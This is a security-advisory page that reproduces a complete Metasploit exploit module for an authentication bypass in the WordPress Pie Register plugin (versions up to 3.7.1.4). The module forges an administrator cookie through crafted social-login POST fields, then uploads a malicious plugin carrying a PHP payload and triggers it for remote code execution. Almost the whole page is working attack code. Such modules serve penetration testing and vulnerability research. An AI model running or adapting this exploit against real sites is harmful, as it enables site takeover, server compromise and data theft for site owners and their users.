WordPress Pie Register 3.7.1.4 Authentication Bypass / Remote Code Execution

2021.11.02
Credit: h00die
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/zip' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress Plugin Pie Register Auth Bypass to RCE', 'Description' => %q{ This module uses an authentication bypass vulnerability in Wordpress Plugin Pie Register <= 3.7.1.4 to generate a valid cookie. With this cookie, hopefully of the admin, it will generate a plugin, pack the payload into it and upload it to a server running WordPress. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # Metasploit module 'Lotfi13-DZ' # EDB ], 'DisclosureDate' => '2021-10-08', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['WordPress', {}]], 'DefaultTarget' => 0, 'References' => [ ['EDB', '50395'] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] } ) ) register_options( [ OptInt.new('USERID', [true, 'User ID to take over', 1]), ] ) end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('pie-register', '3.7.1.5') if checkcode == CheckCode::Safe print_error('Pie Register not a vulnerable version') end return checkcode end def get_cookie res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_post' => { 'user_id_social_site' => datastore['USERID'], 'social_site' => 'true', 'piereg_login_after_registration' => 'true', '_wp_http_referer' => '/login/', 'log' => 'null', 'pwd' => 'null' }, 'keep_cookies' => 'true' }) fail_with(Failure::Unreachable, 'Site not responding') unless res cookie_jar.cookies.each do |c| print_status("Found cookie: #{c.name}=#{c.value}") end res.get_cookies end # direct copy from modules/exploits/unix/webapp/wp_admin_shell_upload.rb def generate_plugin(plugin_name, payload_name) plugin_script = %(<?php /** * Plugin Name: #{plugin_name} * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)} * Author: #{Rex::Text.rand_text_alpha(10)} * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com * License: GPL2 */ ?>) zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script) zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded) zip end def exploit cookie_jar.clear # prevent issues between attempts print_status('Bypassing Authentication') cookie = get_cookie print_status('Preparing payload...') plugin_name = Rex::Text.rand_text_alpha(10) payload_name = Rex::Text.rand_text_alpha(10).to_s payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php") zip = generate_plugin(plugin_name, payload_name) print_status('Uploading payload...') uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie) fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded print_status("Executing the payload at #{payload_uri}...") register_files_for_cleanup("#{payload_name}.php") register_files_for_cleanup("#{plugin_name}.php") register_dir_for_cleanup("../#{plugin_name}") send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5) end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top